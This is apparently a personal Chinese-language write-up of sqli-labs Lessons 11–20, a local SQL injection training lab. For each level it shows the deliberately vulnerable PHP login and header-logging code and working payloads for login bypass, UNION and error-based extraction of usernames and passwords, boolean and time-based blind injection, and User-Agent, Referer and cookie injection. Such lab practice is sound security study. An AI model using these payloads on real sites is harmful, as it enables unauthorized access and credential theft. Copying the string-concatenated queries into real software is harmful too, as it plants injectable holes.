SQLI-LAB 的 实战记录(Less 11 - Less 20)

  • Less - 11 Error Based- String
    • Test
    • Sourse Code
    • Solution
  • Less - 12 Error Based- Double quotes- String
    • Test
    • Sourse Code
    • Solution
  • Less - 13 Double Injection- String- with twist
    • Test
    • Sourse Code
    • Solution
  • Less - 14 Double Injection- Double quotes- String
    • Test
    • Sourse Code
    • Solution
  • Less - 15 Blind- Boolian Based- String
    • Test
    • Sourse Code
    • Solution
  • Less - 16 Blind- Time Based- Double quotes- String
    • Test
    • Sourse Code
    • Solution
  • Less - 17 Update Query- Error based - String
    • Test
    • Sourse Code
    • Solution
  • Less - 18 Header Injection- Error Based- string
    • Test
    • Sourse Code
    • Solution
  • Less - 19 Header Injection- Referer- Error Based- string
    • Test
    • Sourse Code
    • Solution
  • Less - 20 POST - Cookie injections - Uagent field - error based
    • Test
    • Sourse Code
    • Solution

以下内容 只是本人在做 sqli-lab 练习时 写下的记录,仅供参考。
因为本人学过一些 sql注入 的内容,所以大部分内容是没有讲解的,如有不清楚的地方,请自行使用搜索引擎查询,相信会得到所需的内容。

Less - 11 Error Based- String

(第11课:基于错误 - 字符型)

Test:

    http://localhost/sqli-lab/Less-11/index.php
        uname=' &passwd=' &submit=Submit

注:这个是报错的。
建议用火狐浏览器的HackBar或者Burp来做测试
POST 格式 是用 Burp 截的,其实变量名可以直接右键看网页的源代码。
听说过万能密码么?可以考虑使用

Sourse Code:

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
    echo '';   
}else{
    print_r(mysql_error());
    echo '';   
}

Solution:

    uname= ' or '1'='1 &passwd=  ' or '1'='1 &submit=Submit

    uname= ' or 1=1 --+ &passwd= ' or 1=1 --+ &submit=Submit

    uname= ' or 1=1 # &passwd= ' or 1=1 # &submit=Submit

     其它:

    uname= ' union select database(),6  --+ &passwd= ' union select database(),6  --+ &submit=Submit

    uname= ' union select (select group_concat(table_name) from information_schema.tables where table_schema='security'),6 --+ &passwd= '  --+ &submit=Submit

    uname= ' union select (select group_concat(username) from security.users),6 --+ &passwd= '  --+ &submit=Submit

Less - 12 Error Based- Double quotes- String

(第12课:基于错误 - 双引号 - 字符串)

Test:

    http://localhost/sqli-lab/Less-12/index.php
        uname= ") &passwd= " &submit=Submit

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘”) and password=(” ” “) LIMIT 0,1’ at line 1
注:直接就指出了 $uname$passwd 周围是双引号和一层括号

Sourse Code:

$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
    echo '';   
}else{
    print_r(mysql_error());
    echo '';   
}

Solution:

    uname= ")or ("1")=("1 &passwd= ")or ("1")=("1 &submit=Submit 

    uname= ") or 1=1 # &passwd= ") or 1=1 # &submit=Submit

     其它:

    uname= ") union select database(),6 # &passwd= ") or 1=1 # &submit=Submit

    uname= ") union select (select group_concat(table_name) from information_schema.tables where table_schema='security'),6 # &passwd= ") or 1=1 # &submit=Submit

    uname= ") union select (select group_concat(username) from security.users),6 # &passwd= ") or 1=1 # &submit=Submit

Less - 13 Double Injection- String- with twist

(第13课:双注入 - 字符型 - 变形)

Test:

    http://localhost/sqli-lab/Less-13/index.php
        uname= 0' &passwd= 0' &submit=Submit

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘0’ ‘) LIMIT 0,1’ at line 1
注:直接就指出了 $uname$passwd 周围是单引号和一层括号

Sourse Code:

@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo '';   
}else{
    print_r(mysql_error());
    echo '';   
}

Solution:

    uname= ') or ('1')=('1 &passwd= ') or ('1')=('1 &submit=Submit

    uname= ') or 1=1 # &passwd= ') or 1=1 # &submit=Submit

     其它:

    uname= ') union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit

    uname= ') union select count(*),concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit


    uname= ') union select 1,2 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

    uname= ') union select 1,2 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

    uname= ') union select 1,2 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

    uname= ') union select 1,2 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

    uname= ') union select 1,2 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

Less - 14 Double Injection- Double quotes- String

(第14课:双注入 - 双引号 - 字符串)

Test:

    http://localhost/sqli-lab/Less-14/index.php
        uname= "&passwd=' &submit=Submit

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” ” LIMIT 0,1’ at line 1
注:能看出 $uname$passwd 周围只有双引号

Sourse Code:

    $uname='"'.$uname.'"';
    $passwd='"'.$passwd.'"';
    @$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row){
        echo '';   
    }else{
        print_r(mysql_error());
        echo '';   
    }

Solution:

    uname= " or "1"="1&passwd=" or "1"="1 &submit=Submit

     uname=" or 1=1 --+&passwd=" or 1=1 --+&submit=Submit

     uname=" or 1=1 #&passwd=" or 1=1 #&submit=Submit

     其它:

     uname= " union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit


    uname= " union select 1,2 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

    uname= " union select 1,2 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

    uname= " union select 1,2 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

    uname= " union select 1,2 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

    uname= " union select 1,2 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

Less - 15 Blind- Boolian Based- String

(第15课:盲注 - 基于布尔值 - 字符串)

Test:

    http://localhost/sqli-lab/Less-15/index.php
        uname="  or 1=1 # &passwd=" or 1=1 # &submit=Submit
        uname=' or 1=1 #&passwd=' or 1=1 #&submit=Submit

注:第一个错了,第二个对了,被单引号包围,没有回显,考虑盲注。

Sourse Code:

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
        echo '';   
}else{
        echo '';   
}

Solution:

    uname=' or '1'='1 &passwd=' or '1'='1 &submit=Submit

     uname=' or 1=1 #&passwd=' or 1=1 #&submit=Submit


     其它:

     uname=' or (length(database())) = 8 #&passwd=' or 1=1 #&submit=Submit

     uname=' or (ascii(substr((select database()) ,1,1))) = 115 #&passwd=' or 1=1 #&submit=Submit

Less - 16 Blind- Time Based- Double quotes- String

(第16课:盲注 - 基于时间 - 双引号 - 字符串)

Test:

    http://localhost/sqli-lab/Less-16/index.php
        uname=' or 1=1 # &passwd=' or 1=1 #&submit=Submit
        uname=") or 1=1 # &passwd=") or 1=1 # &submit=Submit

注:第一个错了,第二个对了,被双引号包围,没有回显,考虑盲注。
它的回显图片暴露了对错,所以是基于布尔值或是基于时间都行。

Sourse Code:

$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"'; 
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo '';   
}else{
    echo '';     
}

Solution:

    uname=") or ("1")=("1 &passwd=") or ("1")=("1 &submit=Submit

     uname=") or 1=1 or if(1=1, sleep(1), null)  #&passwd=") or 1=1 #&submit=Submit

     其它:

     uname=") or (length(database())) = 8 #&passwd=") or 1=1 #&submit=Submit

     uname=") or (ascii(substr((select database()) ,1,1))) = 115  or if(1=1, sleep(1), null)  #&passwd=") or 1=1 #&submit=Submit

Less - 17 Update Query- Error based - String

(第17课:更新查询 - 基于错误 - 字符串)

Test:

    http://localhost/sqli-lab/Less-17/index.php

注:标题是密码重置,输入框就一个用户名,一个新密码,猜对用户名就好

Sourse Code:

$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    $row1 = $row['username'];     
    $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
    mysql_query($update);
    if (mysql_error()){
        print_r(mysql_error());
    }else{
    }
    echo '';   
}else{
    echo '';
}

注:对 $uname$passwd字段有检查

Solution:

     uname=admin&passwd=666&submit=Submit

     其它:

          uname=Dumb&passwd=666&submit=Submit

          uname=Angelina&passwd=666&submit=Submit

          uname=secure&passwd=666&submit=Submit

Less - 18 Header Injection- Error Based- string

(第18课: 头部注入 - 基于错误 - 字符串)

Test:

    http://localhost/sqli-lab/Less-18/index.php
        uname=admin&passwd=admin&submit=Submit

Your IP ADDRESS is: 127.0.0.1
Your User Agent is: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
注:建议使用火狐的Modify Headers 或 Burp 修改 user-agent的值
已经将上一次练习中动过的 数据库的值改回来了。

Sourse Code:

$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1){
    $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
    mysql_query($insert);
    echo 'Your User Agent is: ' .$uagent;
    print_r(mysql_error());           
    echo '';
}else{
    print_r(mysql_error());
    echo '';   
}

注:对 $uname$passwd字段有检查

Solution:

    ' or '1' = '1

     其它:

         ' or (length(database())) = 8 or if(1=1, sleep(5), null) or '1' = '1

注:以上是user agent 的值,基于时间的盲注,如果不对会延时5s


Less - 19 Header Injection- Referer- Error Based- string

(第19课:头部注入 - Referer字段 - 基于错误- 字符串 )

Test:

     http://localhost/sqli-lab/Less-19/index.php
         uname=admin&passwd=admin&submit=Submit

Your IP ADDRESS is: 127.0.0.1
Your Referer is:
注:建议使用火狐的Modify Headers 或 Burp 修改 referer的值

Sourse Code:

$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1){
        $insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
        mysql_query($insert);
        echo 'Your Referer is: ' .$uagent;
        print_r(mysql_error());           
        echo '';
}else{
        print_r(mysql_error());
        echo '';   
} 

注:对 $uname$passwd字段有检查

Solution:

    ' or '1' = '1

    其它:

        ' or (length(database())) = 8 or if(1=1, sleep(5), null) or '1' = '1

注:以上是referer 的值,基于时间的盲注,如果不对,会延时5s


Less - 20 POST - Cookie injections - Uagent field - error based

(第20课:POST – cookie 注入 - Uagent字段 - 基于错误)

Test:

     http://localhost/sqli-lab/Less-20/index.php
         uname=Dumb&passwd=Dumb&submit=Submit

注:先登录,比如你知道一个账号 uname:Dumb,pwd:Dumb
登录以后会显示用户名 密码 Id cookie IP地址 User Agent。
可以使用火狐浏览器的Firebug来修改cookie中$uname的值。
记得把过期时间也改了,不然刚改完$uname的值,cookie就过期了。。。

Sourse Code:

无cookie时 登录部分
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
$cookee = $row1['username'];
if($row1){
    setcookie('uname', $cookee, time()+3600);   
    header ('Location: index.php');
    print_r(mysql_error());           
    echo '';
}else{
    print_r(mysql_error());
    echo '';   
}
有cookie时 登录部分
$cookee = $_COOKIE['uname'];
$format = 'D d M Y - H:i:s';
$timestamp = time() + 3600; 
echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];           
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
$result=mysql_query($sql);
if (!$result){
   die('Issue with your mysql: ' . mysql_error());
}
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
    echo 'Your ID:' .$row['id'];
}else{   
    echo '';
}

注:对 $uname$passwd字段有检查,有cookie时 从数据库中显示的数据是 username、password和id

Solution:

    Dumb ' or 1=1 #

     其它:

         ' union select 1,database(),6 or 1=1 #

         ' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

         ' union select 1,group_concat(username),group_concat(password) from security.users  #

注:以上是cookie中uname的值

你可能感兴趣的:(sql注入)